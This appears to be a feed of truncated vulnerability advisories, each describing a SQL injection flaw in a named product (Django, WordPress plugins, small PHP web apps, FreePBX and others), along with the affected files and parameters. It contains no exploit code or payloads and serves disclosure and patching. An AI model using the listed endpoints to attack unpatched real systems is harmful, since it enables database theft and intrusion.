SUSE SLES15 / openSUSE 15 Security Update : python-Django (SUSE-SU-2025:4384-1)

The remote SUSE Linux SLES15 / openSUSE 15 host has a package installed that is affected by multiple vulnerabilities as referenced in the SUSE-SU-2025:4384-1 advisory. - CVE-2025-13372: Fixed SQL Injection in FilteredRelation bsc1254437 - CVE-2025-64460: Fixed denial of service via specially...

EUVD-2025-203123

A vulnerability has been found in projectworlds Advanced Library Management System 1.0. Affected by this issue is some unknown functionality of the file /borrowbook.php. Such manipulation of the argument rollnumber leads to sql injection. The attack may be launched remotely. The exploit has been...

CVE-2024-58316 Online Shopping System Advanced 1.0 SQL Injection via Payment Success Parameter

Online Shopping System Advanced 1.0 contains a SQL injection vulnerability in the paymentsuccess.php script that allows attackers to inject malicious SQL through the unfiltered 'cm' parameter. Attackers can exploit the vulnerability by sending crafted SQL queries to retrieve sensitive database...

CVE-2025-14570

CVE-2025-14570 affects projectworlds Advanced Library Management System 1.0. The vulnerability is in the file routes involving the parameter that controls the admin ID (notably /view_admin.php or /view admin.php in variants) where improper handling/manipulation of the admin_id parameter enables S...

OESA-2025-2851 python-django security update

A high-level Python Web framework that encourages rapid development and clean, pragmatic design. Security Fixes: An issue was discovered in 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27. FilteredRelation is subject to SQL injection in column aliases, using a suitably crafted...

CVE-2025-14169 FunnelKit – Funnel Builder for WooCommerce Checkout <= 3.13.1.5 - Unauthenticated SQL Injection

The FunnelKit - Funnel Builder for WooCommerce Checkout plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'opid' parameter in all versions up to, and including, 3.13.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on th...

PT-2025-51032

Name of the Vulnerable Software and Affected Versions itsourcecode COVID Tracking System version 1.0 Description A SQL injection issue exists in an unknown functionality of the file '/admin/?page=zone'. The ID argument can be manipulated to exploit this issue, potentially allowing for remote...

Japan Total System多款产品 SQL注入漏洞

Japan Total System GroupSession Free edition and others are an enterprise collaboration software from Japan Total System. A SQL injection vulnerability exists in various Japan Total System products. The vulnerability stems from an SQL injection issue that may result in the disclosure or...

CVE-2024-58307 CSZCMS 1.3.0 Authenticated SQL Injection via Members View Endpoint

CSZCMS 1.3.0 contains an authenticated SQL injection vulnerability in the members view functionality that allows authenticated attackers to manipulate database queries. Attackers can inject malicious SQL code through the view parameter to potentially execute time-based blind SQL injection attacks...

CVE-2025-14537

A weakness has been identified in code-projects Class and Exam Timetable Management 1.0. Affected by this issue is some unknown functionality of the file /preview7.php. This manipulation of the argument courseyearsection/semester causes sql injection. Remote exploitation of the attack is possible...

CVE-2025-14527 projectworlds Advanced Library Management System view_book.php sql injection

A weakness has been identified in projectworlds Advanced Library Management System 1.0. This vulnerability affects unknown code of the file /viewbook.php. Executing a manipulation of the argument bookid can lead to sql injection. The attack can be executed remotely. The exploit has been made...

FreePBX SQL Injection Vulnerability (CNVD-2025-3038208)

FreePBX formerly known as Asterisk Management Portal is a set of tools from the FreePBX project for configuring Asterisk IP telephony system through a GUI web-based graphical interface. FreePBX suffers from a SQL injection vulnerability that stems from a lack of validation of externally entered S...

CVE-2021-47708

CVE-2021-47708 affects the COMMAX Smart Home System CDP-1020n. A SQL injection in the loginstart.asp id parameter allows an attacker to bypass authentication by sending a crafted POST with malicious id values, manipulating database queries to gain unauthorized access. The Red Hat and EU/NVD-style...

CVE-2025-14255

Vitals ESP developed by Galaxy Software Services has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents...

CVE-2025-64081

SQL injection vulnerability in /php/apipatientschedule.php in SourceCodester Patients Waiting Area Queue Management System v1 allows attackers to execute arbitrary SQL commands via the appointmentID parameter...

OpenBMCS SQL注入漏洞

OpenBMCS is a building management and control system from OpenBMCS Australia. A SQL injection vulnerability exists in OpenBMCS version 2.4, which stems from a SQL injection issue with the id parameter that could lead to the disclosure of database information...

WordPress plugin Animation Addons for Elementor 安全漏洞

WordPress Animation Addons for Elementor plugin is an Elementor page builder extension plugin for the WordPress platform, focused on adding rich animation effects to websites. The WordPress Animation Addons for Elementor plugin suffers from a SQL injection vulnerability that stems from improper...

EUVD-2025-201709

A vulnerability has been found in IdeaCMS up to 1.8. This affects the function whereRaw of the file app/common/logic/index/Coupon.php. Such manipulation of the argument params leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used...

CVE-2025-14255

Vitals ESP developed by Galaxy Software Services has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents...

CVE-2025-14217 code-projects Currency Exchange System edittrns.php sql injection

A vulnerability was identified in code-projects Currency Exchange System 1.0. Impacted is an unknown function of the file /edittrns.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used...